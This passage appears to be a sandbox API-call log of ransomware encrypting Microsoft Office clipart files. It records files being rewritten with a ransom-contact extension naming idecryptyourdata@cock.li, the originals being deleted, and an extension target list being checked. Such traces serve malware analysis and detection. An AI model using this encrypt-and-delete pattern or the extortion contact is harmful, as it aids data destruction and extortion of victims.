lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0200.129] GetLastError () returned 0x0 [0200.129] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x7a46, lpOverlapped=0x0) returned 1 [0200.194] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7a50, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7a50, lpOverlapped=0x0) returned 1 [0200.327] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.327] WriteFile (in: hFile=0x380, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.327] SetEndOfFile (hFile=0x380) returned 1 [0200.327] CloseHandle (hObject=0x380) returned 1 [0200.327] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.327] SetEndOfFile (hFile=0x3a0) returned 1 [0200.328] CloseHandle (hObject=0x3a0) returned 1 [0200.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf")) returned 1 [0200.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 68 [0200.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 68 [0200.329] lstrlenW (lpString=".doc") returned 4 [0200.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.329] lstrlenW (lpString=".docx") returned 5 [0200.329] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.329] lstrlenW (lpString=".pdf") returned 4 [0200.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.329] lstrlenW (lpString=".xls") returned 4 [0200.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.330] lstrlenW (lpString=".xlsx") returned 5 [0200.330] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.330] lstrlenW (lpString=".ppt") returned 4 [0200.330] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 68 [0200.330] lstrlenW (lpString=".zip") returned 4 [0200.330] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.330] lstrlenW (lpString=".rar") returned 4 [0200.330] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.330] lstrlenW (lpString=".bz2") returned 4 [0200.330] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.330] lstrlenW (lpString=".7z") returned 3 [0200.330] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 68 [0200.330] lstrlenW (lpString=".dbf") returned 4 [0200.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 68 [0200.330] lstrlenW (lpString=".1cd") returned 4 [0200.330] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF") returned 68 [0200.330] lstrlenW (lpString=".jpg") returned 4 [0200.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.331] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.331] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.452] GetLastError () returned 0x0 [0200.452] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xf36, lpOverlapped=0x0) returned 1 [0200.563] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xf40, lpOverlapped=0x0) returned 1 [0200.564] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.564] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.565] SetEndOfFile (hFile=0x374) returned 1 [0200.565] CloseHandle (hObject=0x374) returned 1 [0200.565] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.565] SetEndOfFile (hFile=0x3a0) returned 1 [0200.566] CloseHandle (hObject=0x3a0) returned 1 [0200.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200611.wmf")) returned 1 [0200.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 68 [0200.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 68 [0200.567] lstrlenW (lpString=".doc") returned 4 [0200.567] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.567] lstrlenW (lpString=".docx") returned 5 [0200.567] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0200.567] lstrlenW (lpString=".pdf") returned 4 [0200.567] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.567] lstrlenW (lpString=".xls") returned 4 [0200.567] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.567] lstrlenW (lpString=".xlsx") returned 5 [0200.567] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0200.567] lstrlenW (lpString=".ppt") returned 4 [0200.567] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 68 [0200.567] lstrlenW (lpString=".zip") returned 4 [0200.567] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.567] lstrlenW (lpString=".rar") returned 4 [0200.567] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.568] lstrlenW (lpString=".bz2") returned 4 [0200.568] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.568] lstrlenW (lpString=".7z") returned 3 [0200.568] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 68 [0200.568] lstrlenW (lpString=".dbf") returned 4 [0200.568] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 68 [0200.568] lstrlenW (lpString=".1cd") returned 4 [0200.568] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200611.WMF") returned 68 [0200.568] lstrlenW (lpString=".jpg") returned 4 [0200.568] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.568] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.568] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.569] GetLastError () returned 0x0 [0200.569] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xf00, lpOverlapped=0x0) returned 1 [0200.571] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xf10, lpOverlapped=0x0) returned 1 [0200.572] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.572] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.572] SetEndOfFile (hFile=0x374) returned 1 [0200.572] CloseHandle (hObject=0x374) returned 1 [0200.572] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.572] SetEndOfFile (hFile=0x3a0) returned 1 [0200.573] CloseHandle (hObject=0x3a0) returned 1 [0200.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213449.wmf")) returned 1 [0200.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 68 [0200.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 68 [0200.574] lstrlenW (lpString=".doc") returned 4 [0200.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.574] lstrlenW (lpString=".docx") returned 5 [0200.575] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.575] lstrlenW (lpString=".pdf") returned 4 [0200.575] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.575] lstrlenW (lpString=".xls") returned 4 [0200.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.575] lstrlenW (lpString=".xlsx") returned 5 [0200.575] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.575] lstrlenW (lpString=".ppt") returned 4 [0200.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 68 [0200.575] lstrlenW (lpString=".zip") returned 4 [0200.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.575] lstrlenW (lpString=".rar") returned 4 [0200.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.575] lstrlenW (lpString=".bz2") returned 4 [0200.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.575] lstrlenW (lpString=".7z") returned 3 [0200.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 68 [0200.575] lstrlenW (lpString=".dbf") returned 4 [0200.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 68 [0200.575] lstrlenW (lpString=".1cd") returned 4 [0200.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213449.WMF") returned 68 [0200.575] lstrlenW (lpString=".jpg") returned 4 [0200.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.576] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.576] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.577] GetLastError () returned 0x0 [0200.577] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x7cb6, lpOverlapped=0x0) returned 1 [0200.579] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7cc0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7cc0, lpOverlapped=0x0) returned 1 [0200.580] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.581] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.581] SetEndOfFile (hFile=0x374) returned 1 [0200.581] CloseHandle (hObject=0x374) returned 1 [0200.581] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.581] SetEndOfFile (hFile=0x3a0) returned 1 [0200.582] CloseHandle (hObject=0x3a0) returned 1 [0200.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214934.wmf")) returned 1 [0200.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 68 [0200.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 68 [0200.583] lstrlenW (lpString=".doc") returned 4 [0200.584] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString=".docx") returned 5 [0200.584] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0200.584] lstrlenW (lpString=".pdf") returned 4 [0200.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString=".xls") returned 4 [0200.584] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.584] lstrlenW (lpString=".xlsx") returned 5 [0200.584] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0200.584] lstrlenW (lpString=".ppt") returned 4 [0200.584] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 68 [0200.584] lstrlenW (lpString=".zip") returned 4 [0200.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.584] lstrlenW (lpString=".rar") returned 4 [0200.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString=".bz2") returned 4 [0200.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString=".7z") returned 3 [0200.584] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 68 [0200.584] lstrlenW (lpString=".dbf") returned 4 [0200.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 68 [0200.584] lstrlenW (lpString=".1cd") returned 4 [0200.584] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214934.WMF") returned 68 [0200.584] lstrlenW (lpString=".jpg") returned 4 [0200.584] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.585] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.585] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.586] GetLastError () returned 0x0 [0200.586] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xaefa, lpOverlapped=0x0) returned 1 [0200.613] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xaf00, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xaf00, lpOverlapped=0x0) returned 1 [0200.614] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.614] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.614] SetEndOfFile (hFile=0x374) returned 1 [0200.615] CloseHandle (hObject=0x374) returned 1 [0200.615] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.615] SetEndOfFile (hFile=0x3a0) returned 1 [0200.616] CloseHandle (hObject=0x3a0) returned 1 [0200.616] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.616] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf")) returned 1 [0200.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 68 [0200.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 68 [0200.616] lstrlenW (lpString=".doc") returned 4 [0200.616] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString=".docx") returned 5 [0200.617] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0200.617] lstrlenW (lpString=".pdf") returned 4 [0200.617] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString=".xls") returned 4 [0200.617] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.617] lstrlenW (lpString=".xlsx") returned 5 [0200.617] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0200.617] lstrlenW (lpString=".ppt") returned 4 [0200.617] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 68 [0200.617] lstrlenW (lpString=".zip") returned 4 [0200.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.617] lstrlenW (lpString=".rar") returned 4 [0200.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString=".bz2") returned 4 [0200.617] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString=".7z") returned 3 [0200.617] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 68 [0200.617] lstrlenW (lpString=".dbf") returned 4 [0200.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 68 [0200.617] lstrlenW (lpString=".1cd") returned 4 [0200.617] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF") returned 68 [0200.617] lstrlenW (lpString=".jpg") returned 4 [0200.617] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.618] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.618] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.619] GetLastError () returned 0x0 [0200.619] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2d6c, lpOverlapped=0x0) returned 1 [0200.659] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2d70, lpOverlapped=0x0) returned 1 [0200.660] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.660] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.660] SetEndOfFile (hFile=0x374) returned 1 [0200.660] CloseHandle (hObject=0x374) returned 1 [0200.660] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: 